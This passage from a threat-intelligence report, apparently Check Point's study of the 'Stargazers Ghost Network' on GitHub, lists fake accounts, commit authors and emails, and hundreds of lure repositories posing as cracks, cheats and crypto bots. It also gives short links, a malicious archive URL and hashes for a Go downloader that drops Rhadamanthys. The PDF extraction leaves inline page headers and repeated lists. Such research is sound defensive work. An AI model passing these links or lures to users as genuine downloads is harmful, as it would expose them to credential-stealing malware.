pierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo, ramdoni, ratihpurnamasar, raul2341, razzm7, rbxrecoveryexploits, rcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr, rtR4RWp, rudy172, rxcw777, saadanjaved, saintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok, sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani1122, therotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr, tvixterSourceCode, txxzclew, ugyen27, ultralinksgh, vault797478, victid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm, yoosef30, yourscloudyy, yuong22, z8lc, z8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in 0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Codi Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOX Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jas Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagor Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBa OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT220 SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,, Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILW Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, amino axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblanc fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugot khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, la lyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marco mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nend notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea, pier rcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, rifta sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani112 victid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 20 of 45 A little less than 2,000 events took place in these repositories. An impressive 621 occurred on May 27, 2024, and 555 on May 31, 2024, suggesting a possible campaign took place around those dates, or GitHub disrupted some parts of the operations, with Stargazer Goblin “fixing” the affected parts of the network then. Figure 22 – Stargazers Ghost Accounts activities on repositories related to the Atlantida campaign. One account owned the repositories, and another made the README.md commits, which, in some cases, also contained their proton.me email address. The authors of the README.md files were: Commit Date Commit Author Commit Email Repository 2024-05- 25T10:44:45Z GMT-5 slaycorpsa 166757567+slaycorpsa@users.noreply.github.com glassmuysa/TwT-Genr 2024-05- 25T11:03:18Z GMT-5 slaycorpsa 166757567+slaycorpsa@users.noreply.github.com glassmuysa/Mail-Ac-Gen 2024-05- 25T11:55:04Z GMT-5 slaycorpsa 166757567+slaycorpsa@users.noreply.github.com glassmuysa/Ytb-Dwnld 2024-05- 25T12:00:10Z GMT-5 slaycorpsa 166757567+slaycorpsa@users.noreply.github.com glassmuysa/Htlx-Gen-Check 2024-04- 11T23:22:47Z GMT+2 twarisua 166768002+twarisua@users.noreply.github.com valiso0/Mail-Ac-Generator https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 21 of 45 Commit Date Commit Author Commit Email Repository 2024-04- 11T23:24:39Z GMT+2 twarisua 166768002+twarisua@users.noreply.github.com valiso0/Mail-Ac-Generator 2024-05- 25T12:11:09Z GMT+2 twarisua 166768002+twarisua@users.noreply.github.com valiso0/Mail-Ac-Generator 2024-05- 25T12:12:25Z GMT+2 twarisua 166768002+twarisua@users.noreply.github.com valiso0/TwT-Gen 2024-05- 25T12:15:12Z GMT+2 twarisua 166768002+twarisua@users.noreply.github.com valiso0/Ytb-Dwnld 2024-05- 26T10:54:48Z GMT-5 blagoslo seppdrmosi21@proton.me dscvm/Discord-Vbot 2024-05- 26T11:07:42Z GMT-5 blagoslo seppdrmosi21@proton.me dscvm/Visoul-Grabber 2024-05- 27T13:34:17Z GMT-5 ellis441 killimagaro001@proton.me gooles54/Rison-Raid-Bot 2024-05- 27T14:10:03Z GMT-5 ellis441 killimagaro001@proton.me gooles54/Rison-Trading-Bot 2024-05- 27T14:31:44Z GMT-5 ellis441 killimagaro001@proton.me gooles54/WPscn 2024-05- 30T20:24:15Z GMT-4 gwala12 zerocoinmarksirt21@proton.me lzero121/iNS-vWS 2024-05- 30T20:24:29Z GMT-4 gwala12 zerocoinmarksirt21@proton.me lzero121/tK-vWS 2024-05- 30T20:24:46Z GMT-4 gwala12 zerocoinmarksirt21@proton.me lzero121/TWT-vWS 2024-05- 30T20:24:56Z GMT-4 gwala12 zerocoinmarksirt21@proton.me lzero121/Ytb-Vws https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 22 of 45 Commit Date Commit Author Commit Email Repository 2024-05- 31T20:58:21Z GMT-4 qucher52 svarovsky00012@proton.me bleblquck/FT-Vieww 2024-05- 31T20:58:46Z GMT-4 qucher52 svarovsky00012@proton.me bleblquck/Kck-Vw 2024-05- 31T20:58:59Z GMT-4 qucher52 svarovsky00012@proton.me bleblquck/Trv-Vws 2024-05- 31T20:59:09Z GMT-4 qucher52 svarovsky00012@proton.me bleblquck/Tw-Vws Interestingly, in the case of the repository valiso0/Mail-Ac-Generator , there are three commits instead of one. This suggests that if the repository is not discovered and banned, it can be used in multiple campaigns. Typically, the behavior is that the author creates a repository, commits the malicious README.md , and shortly after, the Stargazer accounts proceed to star the repository. Campaign II, Stargazers Ghost Network – Rhadamanthys In many cases, the “Phishing” templates clearly targeted regular users despite the particular intended audience. There was one specific case in which we didn’t know if they targeted Security Researchers or other Threat Actors. The template’s title, “RisePro Stealer + HVNC Crack: The Ultimate Cybersecurity Threat,” provided, in theory, a cracked version of the known infostealer RisePro. In reality, it infected the victims with a GO downloader that later dropped Rhadamanthys. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 23 of 45 Figure 23 – RisePro Phishing Template. Other repositories distributed the same short link, goo.su/n8J4mOH , with different phishing templates targeting different audiences. AmerHashima/Voicemod-2024-Crack-Full-Version Danms661/NEAR-HOT-WALLET-AUTOBOT Danms661/SEED-SEARCHER-Crypto-Checker-30-Wallets Danms661/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-37/Pinnacle-Studio-Crack Essence-Of-Slimez-37/Pro-Tools-Crack Essence-Of-Slimez-37/ProtonVPN-Free-Crack-2024 Essence-Of-Slimez-37/ReiBoot-Pro-Crack-Download-Free Essence-Of-Slimez-37/Revit-Crack Essence-Of-Slimez-37/Rhinoceros-Crack Essence-Of-Slimez-37/RisePro-Stealer-HVNC-Crack https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 24 of 45 Essence-Of-Slimez-37/SEED-SEARCHER-Crypto-Checker-30-Wallets Essence-Of-Slimez-37/Simple-Checker-Crack Essence-Of-Slimez-37/Snapster-autobot Essence-Of-Slimez-37/SolidWorks-crack Essence-Of-Slimez-37/Sound-Forge-crack Essence-Of-Slimez-37/Steam-account-autoregger-creation-of-maFile Essence-Of-Slimez-37/Sublime-Text-crack Essence-Of-Slimez-37/TFT-Unlocker-Tool-FUll Essence-Of-Slimez-37/TeamViewer-Latest-Crack-2024 Essence-Of-Slimez-37/The-unifier-is-both-Video Essence-Of-Slimez-37/Toon-Boom-Harmony-Crack Essence-Of-Slimez-37/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-37/Unity-Pro-Cracks Essence-Of-Slimez-37/VLC-Media-Player-Crack Essence-Of-Slimez-37/Vape-V4-Crack-Kangaroo Essence-Of-Slimez-37/Voicemod-2024-Crack-Full-Version Essence-Of-Slimez-37/Youtube-365-Auto-upload-cheat-checker Essence-Of-Slimez-37/ZBrush-Crack Essence-Of-Slimez-37/pixel-wallet-bot-free Essence-Of-Slimez-37/yescoin-bot-installation HeangHorn/Corel-Draw-Free-Crack-2024 Knight-JNXU/Catizen-Auto-bot-autofarm MikeWoWOne/Fortnite-hack-version MikeWoWOne/GameMaker-Studio-2-Crack MikeWoWOne/HWID-spoofer-for-games MikeWoWOne/IObit-Uninstaller-Latest-Version-Crack MikeWoWOne/JetBrains-IntelliJ-IDEA-Crack MikeWoWOne/KMS-Auto-Windows-and-Office-Activator MikeWoWOne/Kiddions-mod-menu-gta-5 MikeWoWOne/KuCoin-trading-bot MikeWoWOne/Lethal-Company-Hack https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 25 of 45 MikeWoWOne/LoL-hack-script MikeWoWOne/Magix-Music-Maker-Crack MikeWoWOne/Movavi-Video-Editor-Pro-Crack-Download MikeWoWOne/NARAKA-BLADEPOINT-Hack-Free MikeWoWOne/NEAR-HOT-WALLET-AUTOBOT MikeWoWOne/Navisworks-Crack MikeWoWOne/Nero-Burning-ROM-Crack MikeWoWOne/NordVPN-Pro-Crack-Full-Version MikeWoWOne/hamster-kombat-bot-free MikeWoWOne/memefi-coin-crypto-bot Molano11/Nero-Burning-ROM-Crack Molano11/Youtube-365-Auto-upload-cheat-checker Ozkaynak-Sucuk/ARK-radar-hack Ozkaynak-Sucuk/Albion-2024 Ozkaynak-Sucuk/Autodesk-Maya-Crack Ozkaynak-Sucuk/BitMEX-trading-bot Ozkaynak-Sucuk/Bitfinex-bot Ozkaynak-Sucuk/Blum-auto-bot Ozkaynak-Sucuk/Coinbase-pro-trading-bot Ozkaynak-Sucuk/Cs-2-Hack-Skinchanger Ozkaynak-Sucuk/Discord-Nitro-Alt-Generator-Free Ozkaynak-Sucuk/Driver-Booster-Pro-License-Key-Crack Ozkaynak-Sucuk/Fc-24-Hack-Free Ozkaynak-Sucuk/FiveM-Hacks-2024 Ozkaynak-Sucuk/Fixing-Error-kernelbase Ozkaynak-Sucuk/Fortnite-hack-version batuhanodbs/FiveM-Hacks-2024 blackvn05/ReiBoot-Pro-Crack-Download-Free dblancolascarez/CCleaner-Crack jgprimaki/Microsoft-Office-2024-Cracked-Version jzhou8881/Discord-Nitro-Alt-Generator-Free https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 26 of 45 jzhou8881/Driver-Booster-Pro-License-Key-Crack jzhou8881/ESET-NOD32-Antivirus-Crack jzhou8881/Earnings-on-CS2-trades-CS-Trading-helper-Buff163 jzhou8881/Fc-24-Hack-Free jzhou8881/Filmora-License-Key-Crack-Download jzhou8881/FiveM-Hacks-2024 jzhou8881/Fivem-Hack-undetected jzhou8881/Fixing-Error-0x80004005-Unspecified jzhou8881/Fixing-Error-0x80070002 jzhou8881/Fixing-Error-0x80070005-Access-Denied jzhou8881/Fixing-Error-0x8007000E jzhou8881/Fixing-Error-0x80070057-Invalid-Parameter jzhou8881/Fixing-Error-0x80070424-Specified-Service jzhou8881/Fixing-Error-0x80070570 jzhou8881/Fixing-Error-0x80072EE7 jzhou8881/Fixing-Error-0x8015DC12 jzhou8881/Fixing-Error-0x803F8001 jzhou8881/Fixing-Error-0x887A0005-DirectX jzhou8881/Fixing-Error-0x887A0020 jzhou8881/Fixing-Error-0xC000007B jzhou8881/Fixing-Error-0xC0000142 jzhou8881/Fixing-Error-0xc0000005 jzhou8881/Fixing-Error-0xc00000ba jzhou8881/Fixing-Error-BEX jzhou8881/Fixing-Error-d3dx9-43-dll jzhou8881/Fixing-Error-kernelbase jzhou8881/Fortnite-hack-version jzhou8881/Free-Crypto-Trading-Bot-Download teenjay/Sound-Forge-crack teenjay/Steam-account-autoregger-creation-of-maFile teenjay/Sublime-Text-crack https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 27 of 45 teenjay/TFT-Unlocker-Tool-FUll teenjay/TeamViewer-Latest-Crack-2024 teenjay/The-unifier-is-both-Video teenjay/Toon-Boom-Harmony-Crack teenjay/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More teenjay/TradingView-scripts teenjay/VLC-Media-Player-Crack teenjay/Vape-V4-Crack-Kangaroo teenjay/Youtube-365-Auto-upload-cheat-checker teenjay/yescoin-bot-installation yCodezao/Microsoft-Office-2024-Cracked-Version yCodezao/Microsoft-Project-Crack yCodezao/NZT-Poker-AI-Bot-17-Rooms-Cash-Fish-Monitor yCodezao/Notcoin-crypto-bot yCodezao/Parallels-Desktop-Crack yCodezao/Path-Of-Exile-Hack yCodezao/Pinnacle-Studio-Crack yCodezao/PlayDoge-Auto-Farm-and-Bot-Setup yCodezao/ProtonVPN-Free-Crack-2024 yCodezao/ReiBoot-Pro-Crack-Download-Free yCodezao/Rhinoceros-Crack yCodezao/RisePro-Stealer-HVNC-Crack yCodezao/SEED-SEARCHER-Crypto-Checker-30-Wallets yCodezao/Sandbox-CryptoBot yCodezao/ShibaShootout-CryptoBot yCodezao/Snapster-autobot yCodezao/SolidWorks-crack yCodezao/pixel-wallet-bot-free ySunSh1ne/JetBrains-IntelliJ-IDEA-Crack yessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software AmerHashima/Voicemod-2024-Crack-Full-Version Danms661/NEAR-HOT-WALLET-AUTOBOT Danms661/SEED-SEARCHER-Crypto-Checker-30-Wallets Danms661/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 28 of 45 37/Pinnacle-Studio-Crack Essence-Of-Slimez-37/Pro-Tools-Crack Essence-Of-Slimez-37/ProtonVPN-Free-Crack-2024 Essence-Of-Slimez-37/ReiBoot-Pro-Crack-Download-Free Essence-Of-Slimez-37/Revit-Crack Essence-Of-Slimez-37/Rhinoceros-Crack Essence-Of-Slimez-37/RisePro-Stealer-HVNC-Crack Essence-Of-Slimez-37/SEED-SEARCHER-Crypto-Checker-30-Wallets Essence-Of-Slimez-37/Simple-Checker-Crack Essence-Of-Slimez-37/Snapster-autobot Essence-Of-Slimez-37/SolidWorks-crack Essence-Of-Slimez-37/Sound-Forge-crack Essence-Of-Slimez-37/Steam-account-autoregger-creation-of-maFile Essence-Of-Slimez-37/Sublime-Text-crack Essence-Of-Slimez-37/TFT-Unlocker-Tool-FUll Essence-Of-Slimez-37/TeamViewer-Latest-Crack-2024 Essence-Of-Slimez-37/The-unifier-is-both-Video Essence-Of-Slimez-37/Toon-Boom-Harmony-Crack Essence-Of-Slimez-37/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-37/Unity-Pro-Cracks Essence-Of-Slimez-37/VLC-Media-Player-Crack Essence-Of-Slimez-37/Vape-V4-Crack-Kangaroo Essence-Of-Slimez-37/Voicemod-2024-Crack-Full-Version Essence-Of-Slimez-37/Youtube-365-Auto-upload-cheat-checker Essence-Of-Slimez-37/ZBrush-Crack Essence-Of-Slimez-37/pixel-wallet-bot-free Essence-Of-Slimez-37/yescoin-bot-installation HeangHorn/Corel-Draw-Free-Crack-2024 Knight-JNXU/Catizen-Auto-bot-autofarm Major2000/Albion-2024 Major2000/EFT-ESP-hack MikeWoWOne/Fortnite-hack-version MikeWoWOne/GameMaker-Studio-2-Crack MikeWoWOne/HWID-spoofer-for-games MikeWoWOne/IObit-Uninstaller-Latest-Version-Crack MikeWoWOne/JetBrains-IntelliJ-IDEA-Crack MikeWoWOne/KMS-Auto-Windows-and-Office-Activator MikeWoWOne/Kiddions-mod-menu-gta-5 MikeWoWOne/KuCoin-trading-bot MikeWoWOne/Lethal-Company-Hack MikeWoWOne/LoL-hack-script MikeWoWOne/Lumion-Crack MikeWoWOne/Magix-Music-Maker-Crack MikeWoWOne/Matlab-Crack MikeWoWOne/Movavi-Video-Editor-Pro-Crack-Download MikeWoWOne/NARAKA-BLADEPOINT-Hack-Free MikeWoWOne/NEAR-HOT-WALLET-AUTOBOT MikeWoWOne/Navisworks-Crack MikeWoWOne/Nero-Burning-ROM-Crack MikeWoWOne/NordVPN-Pro-Crack-Full-Version MikeWoWOne/hamster-kombat-bot-free MikeWoWOne/memefi-coin-crypto-bot Molano11/Nero-Burning-ROM-Crack Molano11/Youtube-365- Auto-upload-cheat-checker Ozkaynak-Sucuk/1inch-bot Ozkaynak-Sucuk/ARK-radar-hack Ozkaynak-Sucuk/Albion-2024 Ozkaynak-Sucuk/Apex-2024 Ozkaynak-Sucuk/Autodesk-Maya-Crack Ozkaynak-Sucuk/BitMEX-trading-bot Ozkaynak-Sucuk/Bitfinex-bot Ozkaynak-Sucuk/Blum-auto-bot Ozkaynak-Sucuk/Coinbase-pro-trading-bot Ozkaynak-Sucuk/Cs-2- Hack-Skinchanger Ozkaynak-Sucuk/Discord-Nitro-Alt-Generator-Free Ozkaynak-Sucuk/Driver-Booster-Pro-License-Key-Crack Ozkaynak-Sucuk/Fc-24-Hack-Free Ozkaynak-Sucuk/FiveM-Hacks-2024 Ozkaynak-Sucuk/Fixing-Error-kernelbase Ozkaynak-Sucuk/Fortnite-hack-version SpacyXyt/Cinema-4D-Crack SpacyXyt/LoL-hack-script V-arc/Silverfish batuhanodbs/FiveM-Hacks-2024 blackvn05/ReiBoot-Pro-Crack-Download-Free dblancolascarez/CCleaner-Crack jgprimaki/Microsoft-Office-2024-Cracked-Version jzhou8881/Discord-Nitro-Alt-Generator-Free jzhou8881/Driver-Booster-Pro-License-Key-Crack jzhou8881/EFT-ESP-hack jzhou8881/ESET-NOD32-Antivirus-Crack jzhou8881/Earnings-on-CS2- trades-CS-Trading-helper-Buff163 jzhou8881/Fc-24-Hack-Free jzhou8881/Filmora-License-Key-Crack-Download jzhou8881/FiveM-Hacks-2024 jzhou8881/Fivem-Hack-undetected jzhou8881/Fixing-Error-0x80004005-Unspecified jzhou8881/Fixing-Error-0x80070002 jzhou8881/Fixing-Error-0x80070005-Access-Denied jzhou8881/Fixing-Error-0x8007000E jzhou8881/Fixing-Error-0x80070057-Invalid-Parameter jzhou8881/Fixing-Error-0x80070424-Specified-Service jzhou8881/Fixing-Error-0x80070570 jzhou8881/Fixing-Error-0x80072EE7 jzhou8881/Fixing-Error-0x8015DC12 jzhou8881/Fixing-Error-0x803F8001 jzhou8881/Fixing-Error-0x887A0005-DirectX jzhou8881/Fixing-Error-0x887A0020 jzhou8881/Fixing-Error-0xC000007B jzhou8881/Fixing-Error-0xC0000142 jzhou8881/Fixing-Error-0xc0000005 jzhou8881/Fixing-Error-0xc00000ba jzhou8881/Fixing-Error-BEX jzhou8881/Fixing-Error-d3dx9-43-dll jzhou8881/Fixing-Error-kernelbase jzhou8881/Fortnite-hack-version jzhou8881/Free-Crypto-Trading-Bot-Download lixvr/1inch-bot lixvr/BitMEX-trading-bot lixvr/KuCoin-trading-bot lixvr/Sandbox-CryptoBot lixvr/eTukTuk-CryptoBot teenjay/Sound-Forge-crack teenjay/Steam-account-autoregger-creation-of-maFile teenjay/Sublime-Text-crack teenjay/TFT-Unlocker-Tool-FUll teenjay/TeamViewer-Latest-Crack-2024 teenjay/The-unifier-is-both-Video teenjay/Toon-Boom-Harmony-Crack teenjay/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More teenjay/TradingView-scripts teenjay/Uniswap-bot teenjay/Unity-Pro-Cracks teenjay/VLC-Media-Player-Crack teenjay/Vape-V4-Crack-Kangaroo teenjay/Youtube-365-Auto-upload-cheat-checker teenjay/ZBrush-Crack teenjay/xBLAST-auto-bot teenjay/yescoin-bot-installation yCodezao/Microsoft-Office-2024- Cracked-Version yCodezao/Microsoft-Project-Crack yCodezao/NZT-Poker-AI-Bot-17-Rooms-Cash-Fish-Monitor yCodezao/Notcoin-crypto-bot yCodezao/Parallels-Desktop-Crack yCodezao/Path-Of-Exile-Hack yCodezao/Pinnacle-Studio-Crack yCodezao/PlayDoge-Auto-Farm-and-Bot-Setup yCodezao/Pro-Tools-Crack yCodezao/ProtonVPN-Free-Crack-2024 yCodezao/ReiBoot-Pro-Crack-Download-Free yCodezao/Revit-Crack yCodezao/Rhinoceros-Crack yCodezao/RisePro-Stealer-HVNC-Crack yCodezao/SEED-SEARCHER-Crypto-Checker-30-Wallets yCodezao/Sandbox-https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 29 of 45 CryptoBot yCodezao/ShibaShootout-CryptoBot yCodezao/Snapster-autobot yCodezao/SolidWorks-crack yCodezao/cs2-hvh yCodezao/pixel-wallet-bot-free ySunSh1ne/JetBrains-IntelliJ-IDEA-Crack yessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software AmerHashima/Voicemod-2024-Crack-Full-Version Danms661/NEAR-HOT-WALLET-AUTOBOT Danms661/SEED-SEARCHER-Crypto-Checker-30-Wallets Danms661/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-37/Pinnacle-Studio-Crack Essence-Of-Slimez-37/Pro-Tools-Crack Essence-Of-Slimez-37/ProtonVPN-Free-Crack-2024 Essence-Of-Slimez-37/ReiBoot-Pro-Crack-Download-Free Essence-Of-Slimez-37/Revit-Crack Essence-Of-Slimez-37/Rhinoceros-Crack Essence-Of-Slimez-37/RisePro-Stealer-HVNC-Crack Essence-Of-Slimez-37/SEED-SEARCHER-Crypto-Checker-30-Wallets Essence-Of-Slimez-37/Simple-Checker-Crack Essence-Of-Slimez-37/Snapster-autobot Essence-Of-Slimez-37/SolidWorks-crack Essence-Of-Slimez-37/Sound-Forge-crack Essence-Of-Slimez-37/Steam-account-autoregger-creation-of-maFile Essence-Of-Slimez-37/Sublime-Text-crack Essence-Of-Slimez-37/TFT-Unlocker-Tool-FUll Essence-Of-Slimez-37/TeamViewer-Latest-Crack-2024 Essence-Of-Slimez-37/The-unifier-is-both-Video Essence-Of-Slimez-37/Toon-Boom-Harmony-Crack Essence-Of-Slimez-37/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More Essence-Of-Slimez-37/Unity-Pro-Cracks Essence-Of-Slimez-37/VLC-Media-Player-Crack Essence-Of-Slimez-37/Vape-V4-Crack-Kangaroo Essence-Of-Slimez-37/Voicemod-2024-Crack-Full-Version Essence-Of-Slimez-37/Youtube-365-Auto-upload-cheat-checker Essence-Of-Slimez-37/ZBrush-Crack Essence-Of-Slimez-37/pixel-wallet-bot-free Essence-Of-Slimez-37/yescoin-bot-installation HeangHorn/Corel-Draw-Free-Crack-2024 Knight-JNXU/Catizen-Auto-bot-autofarm Major2000/Albion-2024 Major2000/EFT-ESP-hack MikeWoWOne/Fortnite-hack-version MikeWoWOne/GameMaker-Studio-2-Crack MikeWoWOne/HWID-spoofer-for-games MikeWoWOne/IObit-Uninstaller-Latest-Version-Crack MikeWoWOne/JetBrains-IntelliJ-IDEA-Crack MikeWoWOne/KMS-Auto-Windows-and-Office-Activator MikeWoWOne/Kiddions-mod-menu-gta-5 MikeWoWOne/KuCoin-trading-bot MikeWoWOne/Lethal-Company-Hack MikeWoWOne/LoL-hack-script MikeWoWOne/Lumion-Crack MikeWoWOne/Magix-Music-Maker-Crack MikeWoWOne/Matlab-Crack MikeWoWOne/Movavi-Video-Editor-Pro-Crack-Download MikeWoWOne/NARAKA-BLADEPOINT-Hack-Free MikeWoWOne/NEAR-HOT-WALLET-AUTOBOT https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 30 of 45 MikeWoWOne/Navisworks-Crack MikeWoWOne/Nero-Burning-ROM-Crack MikeWoWOne/NordVPN-Pro-Crack-Full-Version MikeWoWOne/hamster-kombat-bot-free MikeWoWOne/memefi-coin-crypto-bot Molano11/Nero-Burning-ROM-Crack Molano11/Youtube-365-Auto-upload-cheat-checker Ozkaynak-Sucuk/1inch-bot Ozkaynak-Sucuk/ARK-radar-hack Ozkaynak-Sucuk/Albion-2024 Ozkaynak-Sucuk/Apex-2024 Ozkaynak-Sucuk/Autodesk-Maya-Crack Ozkaynak-Sucuk/BitMEX-trading-bot Ozkaynak-Sucuk/Bitfinex-bot Ozkaynak-Sucuk/Blum-auto-bot Ozkaynak-Sucuk/Coinbase-pro-trading-bot Ozkaynak-Sucuk/Cs-2-Hack-Skinchanger Ozkaynak-Sucuk/Discord-Nitro-Alt-Generator-Free Ozkaynak-Sucuk/Driver-Booster-Pro-License-Key-Crack Ozkaynak-Sucuk/Fc-24-Hack-Free Ozkaynak-Sucuk/FiveM-Hacks-2024 Ozkaynak-Sucuk/Fixing-Error-kernelbase Ozkaynak-Sucuk/Fortnite-hack-version SpacyXyt/Cinema-4D-Crack SpacyXyt/LoL-hack-script V-arc/Silverfish batuhanodbs/FiveM-Hacks-2024 blackvn05/ReiBoot-Pro-Crack-Download-Free dblancolascarez/CCleaner-Crack jgprimaki/Microsoft-Office-2024-Cracked-Version jzhou8881/Discord-Nitro-Alt-Generator-Free jzhou8881/Driver-Booster-Pro-License-Key-Crack jzhou8881/EFT-ESP-hack jzhou8881/ESET-NOD32-Antivirus-Crack jzhou8881/Earnings-on-CS2-trades-CS-Trading-helper-Buff163 jzhou8881/Fc-24-Hack-Free jzhou8881/Filmora-License-Key-Crack-Download jzhou8881/FiveM-Hacks-2024 jzhou8881/Fivem-Hack-undetected jzhou8881/Fixing-Error-0x80004005-Unspecified jzhou8881/Fixing-Error-0x80070002 jzhou8881/Fixing-Error-0x80070005-Access-Denied jzhou8881/Fixing-Error-0x8007000E jzhou8881/Fixing-Error-0x80070057-Invalid-Parameter jzhou8881/Fixing-Error-0x80070424-Specified-Service jzhou8881/Fixing-Error-0x80070570 jzhou8881/Fixing-Error-0x80072EE7 jzhou8881/Fixing-Error-0x8015DC12 jzhou8881/Fixing-Error-0x803F8001 jzhou8881/Fixing-Error-0x887A0005-DirectX jzhou8881/Fixing-Error-0x887A0020 jzhou8881/Fixing-Error-0xC000007B jzhou8881/Fixing-Error-0xC0000142 jzhou8881/Fixing-Error-0xc0000005 jzhou8881/Fixing-Error-0xc00000ba jzhou8881/Fixing-Error-BEX https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 31 of 45 jzhou8881/Fixing-Error-d3dx9-43-dll jzhou8881/Fixing-Error-kernelbase jzhou8881/Fortnite-hack-version jzhou8881/Free-Crypto-Trading-Bot-Download lixvr/1inch-bot lixvr/BitMEX-trading-bot lixvr/KuCoin-trading-bot lixvr/Sandbox-CryptoBot lixvr/eTukTuk-CryptoBot teenjay/Sound-Forge-crack teenjay/Steam-account-autoregger-creation-of-maFile teenjay/Sublime-Text-crack teenjay/TFT-Unlocker-Tool-FUll teenjay/TeamViewer-Latest-Crack-2024 teenjay/The-unifier-is-both-Video teenjay/Toon-Boom-Harmony-Crack teenjay/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More teenjay/TradingView-scripts teenjay/Uniswap-bot teenjay/Unity-Pro-Cracks teenjay/VLC-Media-Player-Crack teenjay/Vape-V4-Crack-Kangaroo teenjay/Youtube-365-Auto-upload-cheat-checker teenjay/ZBrush-Crack teenjay/xBLAST-auto-bot teenjay/yescoin-bot-installation yCodezao/Microsoft-Office-2024-Cracked-Version yCodezao/Microsoft-Project-Crack yCodezao/NZT-Poker-AI-Bot-17-Rooms-Cash-Fish-Monitor yCodezao/Notcoin-crypto-bot yCodezao/Parallels-Desktop-Crack yCodezao/Path-Of-Exile-Hack yCodezao/Pinnacle-Studio-Crack yCodezao/PlayDoge-Auto-Farm-and-Bot-Setup yCodezao/Pro-Tools-Crack yCodezao/ProtonVPN-Free-Crack-2024 yCodezao/ReiBoot-Pro-Crack-Download-Free yCodezao/Revit-Crack yCodezao/Rhinoceros-Crack yCodezao/RisePro-Stealer-HVNC-Crack yCodezao/SEED-SEARCHER-Crypto-Checker-30-Wallets yCodezao/Sandbox-CryptoBot yCodezao/ShibaShootout-CryptoBot yCodezao/Snapster-autobot yCodezao/SolidWorks-crack yCodezao/cs2-hvh yCodezao/pixel-wallet-bot-free ySunSh1ne/JetBrains-IntelliJ-IDEA-Crack yessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software We observed direct external links to malicious scripts or links redirecting to another GitHub repository release, but threat actors also utilized short links like goo.su and bit.ly . Searching the previously mentioned short-link domains, we obtained around 400 repositories. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 32 of 45 Figure 24 – Results with “Download” and short-links. The short Download link redirects the victims to download an archive file from maestrascreciendoenamor.com/Loader-Installers.zip . Another short link, goo.su/rH3n , also redirects this URL, making a total of 142 repositories distribute the below GO downloader. 802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\CFG.ini B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 